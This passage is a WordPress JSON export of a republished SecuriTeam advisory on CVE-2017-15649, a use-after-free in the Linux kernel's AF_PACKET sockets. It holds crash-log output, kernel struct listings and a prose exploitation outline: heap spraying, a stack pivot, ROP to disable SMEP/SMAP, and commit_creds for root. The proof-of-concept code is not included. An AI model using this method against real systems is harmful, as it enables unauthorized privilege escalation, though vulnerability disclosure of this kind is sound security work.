class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-68\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.876931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28780<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span 
class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-69\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.878913<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">ffff880067d28800<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-70\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.880658<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">^<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a1c8f6415a7f994363130-71\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.884772<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28880<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-72\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.890978<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28900<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a1c8f6415a7f994363130-73\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.897763<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>We know that the freed object is a kmalloc-4096 object:<\/p>\n<pre>struct packet_fanout {\n\tpossible_net_t\t\tnet;\n\tunsigned int\t\tnum_members;\n\tu16\t\t\tid;\n\tu8\t\t\ttype;\n\tu8\t\t\tflags;\n\tunion {\n\t\tatomic_t\t\trr_cur;\n\t\tstruct bpf_prog __rcu\t*bpf_prog;\n\t};\n\tstruct list_head\tlist;\n\tstruct sock\t\t*arr[PACKET_FANOUT_MAX];\n\tspinlock_t\t\tlock;\n\trefcount_t\t\tsk_ref;\n\tstruct packet_type\tprot_hook ____cacheline_aligned_in_smp;\n};<\/pre>\n<p>Its prot_hook member is referenced in the packet handler when it is registered via dev_add_pack() from register_prot_hook() in af_packet.c:<\/p>\n<pre>struct packet_type {\n\t__be16\t\t\ttype;\t\/* This is really htons(ether_type). *\/\n\tstruct net_device\t*dev;\t\/* NULL is wildcarded here\t     *\/\n\tint\t\t\t(*func) (struct sk_buff *,\n\t\t\t\t\t struct net_device *,\n\t\t\t\t\t struct packet_type *,\n\t\t\t\t\t struct net_device *);\n\tbool\t\t\t(*id_match)(struct packet_type *ptype,\n\t\t\t\t\t    struct sock *sk);\n\tvoid\t\t\t*af_packet_priv;\n\tstruct list_head\tlist;\n};<\/pre>\n<p>
<\/p>\n<p>The function pointers inside struct packet_type live in a large slab cache (kmalloc-4096), which makes heap spraying easier and more reliable, because the kernel uses the larger slab caches less often.<\/p>\n<p>We can use ordinary kernel heap spraying, for example with sendmmsg() or other functions, to replace the contents of the freed packet_fanout object.<\/p>\n<p>Even though the allocation is not permanent, it still replaces the targeted contents of packet_fanout (for example the function pointers), and because kmalloc-4096 is very stable, it is very unlikely that another allocation will corrupt our payload.<\/p>\n<p>id_match() is called when an skb is sent with dev_queue_xmit(), a path that can be reached through sendmsg on an AF_PACKET socket. If the dev_queue_xmit argument is non-NULL, it loops through the list of packet handlers, calling id_match(). The vulnerability can therefore be exploited in the following way.<\/p>\n<p>Once the kernel code segment is known, we can pivot the kernel stack into our fake packet_fanout object and ROP. The first argument, ptype, holds the address of the prot_hook member of our fake object, which tells us where to jump.<\/p>\n<p>Once in ROP, we can jump to native_write_cr4(x) to disable SMEP\/SMAP, then jump back to user space to run our real payload, which calls commit_creds(prepare_kernel_cred(0)) to elevate our privileges to root.<\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3543\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 08:12:04 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following security advisory describes a use-after-free (UAF) vulnerability in AF_PACKET in the Linux kernel; successful exploitation may lead to privilege escalation. AF_PACKET sockets \u201callow users to send or receive packets at the device driver level\u201d. For example, a user can implement their own protocol on top of the physical layer, or sniff packets that include Ethernet or higher-level protocol headers. Credit An independent security researcher discovered this vulnerability and reported it to Beyond Security's SSD. Vendor Response Update 1 CVE: CVE-2017-15649 \u201cIt is quite likely that this is already fixed by: packet: hold bind lock when rebinding to fanout hook &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/ Also relevant, but not yet merged, is packet: in packet_do_bind, test fanout with bind_lock held &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/ We verified that this does not trigger on v4.14-rc2, but the test succeeded on the first commit (008ba2a13f2d).\u201d Vulnerability Details The UAF is caused by a race condition between fanout_add (from setsockopt) and the AF_PACKET socket. Even though a packet_fanout has already been created by fanout_add(), the race causes __unregister_prot_hook() from packet_do_bind() to set po-&gt;running to 0. This lets us bypass the check for unregister_prot_hook() in packet_release(), so that the packet_fanout can still be referenced from the packet_type linked list even after it has been freed. Proof of Concept [crayon-5a1c8f5b84fe1712795706\/] Crash log [crayon-5a1c8f5b84fea292617098\/] We know that the freed object is a kmalloc-4096 object: [crayon-5a1c8f5b84ff4648568286\/] Its prot_hook member is referenced in the packet handler when it is registered via dev_add_pack() from register_prot_hook() in af_packet.c: 
[crayon-5a1c8f5b84ff7247098366\/] The function pointers inside struct packet_type live in a large slab cache (kmalloc-4096), which makes heap spraying easier and more reliable, because the kernel uses the larger slab caches less often. We can use ordinary kernel heap spraying, for example with sendmmsg() or other functions, to replace the contents of the freed packet_fanout object. Even though the allocation is not permanent, it still replaces the targeted contents of packet_fanout (for example the function pointers), and because kmalloc-4096 is very stable, it is very unlikely that another allocation will corrupt our payload. id_match() is called when an skb is sent with dev_queue_xmit(), a path that can be reached through sendmsg on an AF_PACKET socket. If the dev_queue_xmit argument is non-NULL, it loops through the list of packet handlers, calling id_match(). The vulnerability can therefore be exploited in the following way. Once the kernel code segment is known, we can pivot the kernel stack into our fake packet_fanout object and ROP. The first argument, ptype, holds the address of the prot_hook member of our fake object, which tells us where to jump. 
Once in ROP, we can jump to native_write_cr4(x) to disable SMEP\/SMAP, then jump back to user space to run our real payload, which calls commit_creds(prepare_kernel_cred(0)) to elevate our privileges to root.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11946,10757,13145],"class_list":["post-10624","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10624"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10624\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10624"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templa
ted":true}]}}